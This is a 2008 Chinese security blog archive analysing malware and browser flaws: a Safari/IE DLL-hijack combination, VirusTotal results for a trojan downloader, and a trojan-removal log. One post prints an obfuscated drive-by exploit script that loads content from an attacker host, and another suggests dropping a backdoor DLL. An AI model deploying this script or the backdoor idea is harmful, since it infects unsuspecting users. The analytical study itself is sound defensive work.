Archive for the ‘病毒学习’ Category
Wednesday, June 11th, 2008
Nitesh Dhanjani 发现的这个(windows版的safari浏览器在不经用户确认的情况下把文件下载到用户桌面)漏洞。标题为"Safari Carpet Bomb"的介绍可以在Nitesh Dhanjani博客看到,接着微软就发出一份(标题为:Blended Threat from Combined Attack Using Apple’s Safari on the Windows Platform)“安全公告”。Aviv Raff在他的博客发表“Safari pwns Internet Explorer”澄清这个(MS)漏洞早在2006年就已经报告过。
关于这个混合Safari和IE漏洞攻击的分析
这个IE老的漏洞Aviv Raff在他的两篇博客中已经做过比较详细的描述"Internet Explorer 7 - Still Spyware Writers Heaven",和"IE7 DLL-load hijacking Code Execution Exploit PoC" 漏洞演示代码可以在"milw0rm"找到。
这个漏洞主要出在:ie(Windows Internet Explorer)优先从“用户桌面”加载动态链接库文件(dll),而不是从程序目录(一般是:C:\WINDOWS\SYSTEM32)。
windows版的safari浏览器在没有得到确认的情况下自动下载文件到用户桌面是这次引发windows用户遭受攻击的前因。当动态链接库文件(DLL文件)为特定的名称时打开ie将从这里(用户桌面)加载这些动态链接库文件。两件事情混合起来就是:IE加载运行safari自动下载到用户桌面的动态链接库文件,最终导致用户遭受恶意攻击。
作为演示下边为LIUDIEYU写的演示代码(ie加载后调用记事本打开一个不存在的文件)
另外Aviv Raff也写过个演示代码可以在"milw0rm"找到。
(PS:其实你可以写个木马后门dll扔出去让他运行!!)
/*
Copyright (C) 2006-2007 Aviv ...
Posted in 今日一点, 漏洞, 病毒学习 | No Comments »
Friday, May 30th, 2008
得到样本,打开虚拟机,先到http://www.virustotal.com/分析一下情况:
文件 explorer.exe 接收于 2008.05.29 16:26:52 (CET)
反病毒引擎
版本
最后更新
扫描结果</td
AhnLab-V3
2008.5.29.0
2008.05.29
-</td
AntiVir
7.8.0.19
2008.05.29
TR/Downloader.Gen</td
Authentium
5.1.0.4
2008.05.28
W32/Agent.L.gen!Eldorado</td
Avast
4.8.1195.0
2008.05.29
Win32:Agent-XEY</td
AVG
7.5.0.516
2008.05.29
KillAV.JR</td
BitDefender
7.2
2008.05.29
Generic.Malware.Bdld.2B3CEAD5</td
CAT-QuickHeal
9.50
2008.05.28
TrojanDownloader.Zlob.ww</td
ClamAV
0.92.1
2008.05.29
PUA.Packed.UPack-2</td
DrWeb
4.44.0.09170
2008.05.29
DLOADER.Trojan</td
eSafe
7.0.15.0
2008.05.29
Suspicious File</td
eTrust-Vet
31.4.5832
2008.05.29
Win32/Vraja.A</td
Ewido
4.0
2008.05.29
-</td
F-Prot
4.4.4.56
2008.05.28
W32/Agent.L.gen!Eldorado</td
F-Secure
6.70.13260.0
2008.05.29
W32/Suspicious_U.gen</td
Fortinet
3.14.0.0
2008.05.29
-</td
GData
2.0.7306.1023
2008.05.29
Trojan.Win32.Agent.ksq</td
Ikarus
T3.1.1.26.0
2008.05.29
Trojan-Downloader.Win32.Zlob.and</td
Kaspersky
7.0.0.125
2008.05.29
Trojan.Win32.Agent.ksq</td
McAfee
5305
2008.05.28
New Malware.aj</td
Microsoft
None
2008.05.29
-</td
NOD32v2
3144
2008.05.29
-</td
Norman
5.80.02
2008.05.28
W32/Smalldrp.VJT</td
Panda
9.0.0.4
2008.05.28
Suspicious file</td
Prevx1
V2
2008.05.29
-</td
Rising
20.46.32.00
2008.05.29
Trojan.DL.Win32.Undef.mz</td
Sophos
4.29.0
2008.05.29
Mal/Heuri-E</td
Sunbelt
3.0.1123.1
2008.05.17
VIPRE.Suspicious</td
Symantec
10
2008.05.29
-</td
TheHacker
6.2.92.322
2008.05.28
W32/Behav-Heuristic-060</td
VBA32
3.12.6.6
2008.05.29
Trojan.Win32.Agent.ksq</td
VirusBuster
4.3.26:9
2008.05.28
Packed/Upack</td
Webwasher-Gateway
6.6.2
2008.05.29
Trojan.Downloader.Gen</td
附加信息
File size: 10920 bytes
MD5...: adf37694614161a5c513069f6a4353a0
SHA1..: d8c88000dbbd4d09487afa8e82a0af1be35e6fba
SHA256: f798ccb117c4751b52b3745020a3856a204e6e44d3af6e04606cbdcc21cd5d18
SHA512: 945496614f4d3a408aaf5950e952b49424866c948fa088b2f6a427b1d0467ad3
c1ed82c73f500cdf7f53c7870ed8a34c70042c96f4f8595b60c9014dd3a87cc2
PEiD..: -
PEInfo: PE Structure information
( base data )
entrypointaddress.: 0x401018
timedatestamp.....: 0x4011b0be (Fri Jan 23 23:39:42 2004)
machinetype.......: 0x14c (I386)
( 3 sections )
name viradd virsiz rawdsiz ntrpy md5
PS 0x1000 0x15000 0x1f0 5.16 a035efb8d8b8853a55e11efef94607b6
@A 0x16000 0xa000 0x28a8 7.98 2904fb87f598070c35d60ee3179aaebb
RA@ ...
Posted in 今日一点, 病毒学习 | No Comments »
Monday, May 12th, 2008
F-Secure推出的病毒分析课程并提供了PDF版本教材下载,对病毒分析技术感兴趣的朋友可以看看!e文,课程下载地址:http://www.tml.tkk.fi/Opinnot/T-110.6220/2008/
Course information
The course teaches students what malicious code is and how it can be detected and analyzed. Topics of the course include malware taxonomy, reverse engineering, code emulation fundamentals, basic cryptoanalysis of malicious crypto, and antivirus engine basics. Course includes a homework project that requires programming skills.
(e2z)
From:F-Secure 官方博客http://www.f-secure.com/weblog/
Posted in 推荐,内容, 病毒学习 | No Comments »
Tuesday, May 6th, 2008
这个地址是在telnet百度的时候发现的:
<script language="javascript" SRC="http://err.www404.cn:53/ads.js"></script>
把err.www404.cn:53/ads.js里的eval替换为document.write然后加个<script>的壳保存为html文件就可以初步解密出这个js的原型,然后分析代码可以知道是利用的ms06014这个漏洞(貌似还有暴风影音的痕迹)。只要你打上这个ms06041补丁就不会中这个ads.js的阴谋啦,还有最好把你的暴风影音也升级下。
ads.js源码:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('A B(){}f.L=B;b(4.t.G(\'s\')==-1){z()}A z(){2 p="Q:N"+"Y"+"-Z-V";2 y="0-R"+"-10";2 v=p+y;2 9="[x O]";h{2 e;2 w=(4["P"+"U"]("x"));w["X"]("W",v);f["E"]["D"]("C"+"F."+"S"+"M"+"e"+"K","")}k(e){};j{2 a=i J();a.H(a.T()+1f);4.t=\'s=1s;1n=/;a=\'+a.1j();4.8("<r 1l=1k:1h 6=7://d.c.5/1m.g></r>");4.8("<3 6=7://d.c.5/11.g></3>");b(e!=9){}1r{h{2 1q=i f["l"]("1o.1p");2 n}k(n){};j{b(n!=9){4.8("<3 6=7://d.c.5/1i.g><\\/3>")}}h{2 q=i f["l"]("1g"+"16.17"+"15.1");2 m}k(m){};j{b(m!=9){4.8("<3 6=7://d.c.5/q.g><\\/3>")}}h{2 14=i f["l"]("12"+"13.I"+"18.1");2 o}k(o){};j{b(o!=9){4.8("<3 6=7://d.c.5/19.g><\\/3>")}}}}}4.8("<3 6=7://u.1e.5.1d.1c/1a/1b.u></3>");',62,91,'||var|script|document|cn|src|http|write|errinfo|hoodt|if|www404|err||window|gif|try|new|finally|catch|ActiveXObject|Gl|sto|IEINFO|Cikeid1|lz|iframe|MyCookie|cookie|js|Cikeid|afilesto|object|Cikeid2|exit|function|writeInfo|Ad|createobject|ado|odb|indexOf|setTime||Date|am|onload|tr|BD9|Error|creat|clsid|983A||getTime|eElement|11D|classid|setAttribute|6C556|65A3|00C04FC29E36|real10|IERP|Ctl|reals|atCtrl|AT|GLCh|ERPCtl|real11|621252|ystat|com|yahoo|tongji|86400000|GLCH|none|bf|toGMTString|display|style|614|path|MPS|StormPlayer|cikewm|else|lonely'.split('|'),0,{}))
ads.js解密后源码(我打过补丁啦,解密有问题,如果感兴趣可以自行去解密这个ads.js,然后分析他都从哪里下载啦什么):
function writeInfo(){}window.onload=writeInfo;if(document.cookie.indexOf('MyCookie')==-1){exit()}function exit(){var Cikeid1="clsid:BD9"+"6C556"+"-65A3-11D";var Cikeid2="0-983A"+"-00C04FC29E36";var Cikeid=Cikeid1+Cikeid2;var errinfo="[object Error]";try{var e;var afilesto=(document["creat"+"eElement"]("object"));afilesto["setAttribute"]("classid",Cikeid);window["ado"]["createobject"]("Ad"+"odb."+"S"+"tr"+"e"+"am","")}catch(e){};finally{var hoodt=new ...
Posted in 今日一点, 病毒学习 | No Comments »
Tuesday, April 22nd, 2008
好不容易抓到个中奖的机子(其他机子都打补丁啦,就有两个没打过补丁!!后来挪进来的机子)
360安全卫士木马查杀历史报告
木马名称:恶意干扰对象
路径:C:\WINDOWS\DOWNLO~1\405.exe
查杀时间 :2008-04-21 20:17
木马名称:伪Honey木马下载器
路径:C:\PROGRA~1\COMMON~1\CPUSH\cpush.dll
查杀时间 :2008-04-21 20:17
木马名称:Weiyuan木马程序
路径:C:\windows\system32\weiyuan.exe
查杀时间 :2008-04-21 20:17
木马名称:PWL.LMir木马程序
路径:C:\WINDOWS\system32\inf\svch0st.exe
查杀时间 :2008-04-21 20:17
木马名称:伪linkinfo恶意程序
路径:C:\WINDOWS\linkinfo.dll
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.sua
路径:C:\Program Files\Common Files\CPUSH\Uninst.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.aza
路径:C:\Documents and Settings\Admin\桌面\Microsoft.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.aza
路径:C:\Documents and Settings\Admin\Local Settings\Temporary Internet Files\Content.IE5\A9GNEBU5\m[1].exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan-Spy/Win32.FtpSend.b
路径:C:\Documents and Settings\Admin\Local Settings\Temporary Internet Files\Content.IE5\A9GNEBU5\dat[1].asp
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.laj
路径:C:\Documents and Settings\Admin\Local Settings\Temporary Internet Files\Content.IE5\4B6LWHOV\1[1].exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.sda
路径:C:\Documents and Settings\Admin\Local Settings\Temp\wip.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan/Win32.Rodog.aha
路径:C:\Documents and Settings\Admin\Local Settings\Temp\223.exe
查杀时间 :2008-04-21 20:17
木马名称:Trojan-Downloader/Win32.QQHelper.bed
路径:C:\Documents ...
Posted in 今日一点, 病毒学习 | No Comments »